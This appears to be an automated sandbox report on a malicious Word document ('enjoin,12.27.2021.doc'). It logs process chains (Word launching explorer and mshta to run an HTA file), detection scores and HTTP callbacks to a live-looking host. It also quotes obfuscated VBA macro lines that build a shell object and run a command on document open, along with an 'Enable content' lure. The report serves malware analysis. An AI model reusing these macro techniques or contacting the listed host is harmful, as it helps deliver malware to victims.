Source: enjoin,12.27.2021.doc |
ReversingLabs: Detection: 44% |
Source: enjoin,12.27.2021.doc |
Joe Sandbox ML: detected |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process created: C:\Windows\explorer.exe |
Source: global traffic |
HTTP traffic detected: GET /frhe/L8dclCye7SQ5WTFva78FDxOjGBOF9iJro4DRgV/5inYIaSBt0KLfMB9kXwZBv6ZpTsny6/qAhIQjrAaLKJeTLQnbCarASpMADNe9u19Kylnkoreo7/SjqMh4eEx0Hx9b4h5e2fMcQgeIbFT/kKeSzfUaenwSFB/ISkVIHedx0p/49280/SruwcI68Yb5pVaVqfvyOHztDsbEuhGxtlV6bpgPIFvGFQ277/7FkN9pAcaWDfFlGNBeuaqGed8iDibaWexT/GyAAzLRbFAU1XErrU1F/vaci3?page=V8BBaQuem65&page=XYvyd0Dcrg6fJYLGHRVWp7s1tv&page=dvZwXcjcYCjBX8tPaALshiDAx85PEq&sid=10tOgWzOZj9xyAidNJAz3d9Ob0 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: patelboostg.comConnection: Keep-Alive |
Source: mshta.exe, 00000004.00000002.419910763.0000000006CAA000.00000004.00000001.sdmp |
String found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin) |
Source: mshta.exe, 00000004.00000002.417663387.0000000003B50000.00000002.00020000.sdmp |
String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail) |
Source: mshta.exe, 00000004.00000002.419910763.0000000006CAA000.00000004.00000001.sdmp |
String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin) |
Source: mshta.exe, 00000004.00000002.417663387.0000000003B50000.00000002.00020000.sdmp |
String found in binary or memory: http://investor.msn.com |
Source: mshta.exe, 00000004.00000002.417663387.0000000003B50000.00000002.00020000.sdmp |
String found in binary or memory: http://investor.msn.com/ |
Source: mshta.exe, 00000004.00000002.417946104.0000000003D37000.00000002.00020000.sdmp |
String found in binary or memory: http://localizability/practices/XML.asp |
Source: mshta.exe, 00000004.00000002.417946104.0000000003D37000.00000002.00020000.sdmp |
String found in binary or memory: http://localizability/practices/XMLConfiguration.asp |
Source: mshta.exe, 00000004.00000003.416145153.000000000050F000.00000004.00000001.sdmp, mshta.exe, 00000004.00000002.417236396.00000000004EC000.00000004.00000001.sdmp, mshta.exe, 00000004.00000002.417153403.0000000000444000.00000004.00000020.sdmp, mshta.exe, 00000004.00000002.419957947.0000000006CBD000.00000004.00000001.sdmp, mshta.exe, 00000004.00000003.416821564.00000000004A0000.00000004.00000001.sdmp, mshta.exe, 00000004.00000003.416902937.00000000004A3000.00000004.00000001.sdmp, mshta.exe, 00000004.00000003.416884776.0000000006CBD000.00000004.00000001.sdmp, mshta.exe, 00000004.00000003.415996164.00000000004A0000.00000004.00000001.sdmp |
String found in binary or memory: http://patelboostg.com/frhe/L8dclCye7SQ5WTFva78FDxOjGBOF9iJro4DRgV/5inYIaSBt0KLfMB9kXwZBv6ZpTsny6/qA |
Source: explorer.exe, 00000002.00000002.407152025.0000000001C80000.00000002.00020000.sdmp, explorer.exe, 00000003.00000002.407524765.0000000001D80000.00000002.00020000.sdmp, mshta.exe, 00000004.00000002.418206681.0000000003F30000.00000002.00020000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous. |
Source: mshta.exe, 00000004.00000002.417946104.0000000003D37000.00000002.00020000.sdmp |
String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check |
Source: mshta.exe, 00000004.00000002.417946104.0000000003D37000.00000002.00020000.sdmp |
String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true |
Source: explorer.exe, 00000002.00000002.407152025.0000000001C80000.00000002.00020000.sdmp, explorer.exe, 00000003.00000002.407524765.0000000001D80000.00000002.00020000.sdmp, mshta.exe, 00000004.00000002.418206681.0000000003F30000.00000002.00020000.sdmp |
String found in binary or memory: http://www.%s.comPA |
Source: mshta.exe, 00000004.00000002.417663387.0000000003B50000.00000002.00020000.sdmp |
String found in binary or memory: http://www.hotmail.com/oe |
Source: mshta.exe, 00000004.00000002.417946104.0000000003D37000.00000002.00020000.sdmp |
String found in binary or memory: http://www.icra.org/vocabulary/. |
Source: mshta.exe, 00000004.00000002.417663387.0000000003B50000.00000002.00020000.sdmp |
String found in binary or memory: http://www.msnbc.com/news/ticker.txt |
Source: mshta.exe, 00000004.00000002.417663387.0000000003B50000.00000002.00020000.sdmp |
String found in binary or memory: http://www.windows.com/pctv. |
Source: global traffic |
HTTP traffic detected: GET /frhe/L8dclCye7SQ5WTFva78FDxOjGBOF9iJro4DRgV/5inYIaSBt0KLfMB9kXwZBv6ZpTsny6/qAhIQjrAaLKJeTLQnbCarASpMADNe9u19Kylnkoreo7/SjqMh4eEx0Hx9b4h5e2fMcQgeIbFT/kKeSzfUaenwSFB/ISkVIHedx0p/49280/SruwcI68Yb5pVaVqfvyOHztDsbEuhGxtlV6bpgPIFvGFQ277/7FkN9pAcaWDfFlGNBeuaqGed8iDibaWexT/GyAAzLRbFAU1XErrU1F/vaci3?page=V8BBaQuem65&page=XYvyd0Dcrg6fJYLGHRVWp7s1tv&page=dvZwXcjcYCjBX8tPaALshiDAx85PEq&sid=10tOgWzOZj9xyAidNJAz3d9Ob0 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: patelboostg.comConnection: Keep-Alive |
Source: Screenshot number: 4 |
Screenshot OCR: Enable editing" button on the top bar, and then click "Enable content" O Page: I of I , Words: |
Source: Screenshot number: 4 |
Screenshot OCR: Enable content" O Page: I of I , Words: 118 i C i N@m 13 ;a 10096 G) FI G) ,, " I "I Wb, lymm |
Source: enjoin,12.27.2021.doc |
OLE, VBA macro line: CreateObject("wsc" + cont1("company") + "ell").exec cont1("category") + " " + mouseVideo |
|
Source: enjoin,12.27.2021.doc |
OLE, VBA macro line: Sub Document_Open() |
|
Source: enjoin,12.27.2021.doc |
OLE indicator, VBA macros: true |
Source: enjoin,12.27.2021.doc |
OLE, VBA macro line: cont1 = activedocument.builtindocumentproperties(i7computermonitor).value |
Source: enjoin,12.27.2021.doc |
ReversingLabs: Detection: 44% |
Source: unknown |
Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding |
|
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process created: C:\Windows\explorer.exe explorer i7Gigabyte.hta |
|
Source: unknown |
Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding |
|
Source: C:\Windows\explorer.exe |
Process created: C:\Windows\SysWOW64\mshta.exe "C:\Windows\SysWOW64\mshta.exe" "C:\Users\user\Documents\i7Gigabyte.hta" |
|
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process created: C:\Windows\explorer.exe explorer i7Gigabyte.hta |
Jump to behavior |
Source: C:\Windows\explorer.exe |
Process created: C:\Windows\SysWOW64\mshta.exe "C:\Windows\SysWOW64\mshta.exe" "C:\Users\user\Documents\i7Gigabyte.hta" |
Jump to behavior |
Source: enjoin,12.27.2021.doc |
OLE indicator, Word Document stream: true |
Source: classification engine |
Classification label: mal72.expl.winDOC@6/13@1/1 |
Source: mshta.exe, 00000004.00000002.417663387.0000000003B50000.00000002.00020000.sdmp |
Binary or memory string: .VBPud<_ |
Source: enjoin,12.27.2021.doc |
OLE document summary: title field not present or empty |
Source: enjoin,12.27.2021.doc |
OLE document summary: author field not present or empty |
Source: enjoin,12.27.2021.doc |
OLE document summary: edited time not present or 0 |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process created: C:\Windows\explorer.exe |
|
Source: unknown |
Process created: C:\Windows\explorer.exe |
|
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process created: C:\Windows\explorer.exe |
Jump to behavior |
Source: enjoin,12.27.2021.doc |
Initial sample: OLE summary comments = ta |
Source: enjoin,12.27.2021.doc |
Initial sample: OLE document summary bytes = 26624 |
Source: enjoin,12.27.2021.doc |
Initial sample: OLE document summary category = explorer |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\explorer.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\explorer.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\explorer.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\explorer.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\mshta.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\mshta.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\mshta.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: enjoin,12.27.2021.doc |
Stream path 'Data' entropy: 7.93699752134 (max. 8.0) |
Source: C:\Windows\explorer.exe TID: 3000 |
Thread sleep time: -60000s >= -30000s |
Jump to behavior |
Source: C:\Windows\explorer.exe TID: 3000 |
Thread sleep time: -60000s >= -30000s |
Jump to behavior |
Source: C:\Windows\explorer.exe TID: 2924 |
Thread sleep time: -60000s >= -30000s |
Jump to behavior |
Source: C:\Windows\SysWOW64\mshta.exe TID: 2816 |
Thread sleep time: -300000s >= -30000s |
Jump to behavior |
Source: explorer.exe, 00000003.00000003.406744382.000000000035E000.00000004.00000001.sdmp |
Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}] |
Source: C:\Windows\explorer.exe |
Directory queried: C:\Users\user\Documents |
Jump to behavior |
Source: C:\Windows\explorer.exe |
Directory queried: C:\Users\user\Documents |
Jump to behavior |
Source: C:\Windows\SysWOW64\mshta.exe |
Directory queried: C:\Users\user\Documents |
Jump to behavior |
Source: C:\Windows\SysWOW64\mshta.exe |
Directory queried: C:\Users\user\Documents |
Jump to behavior |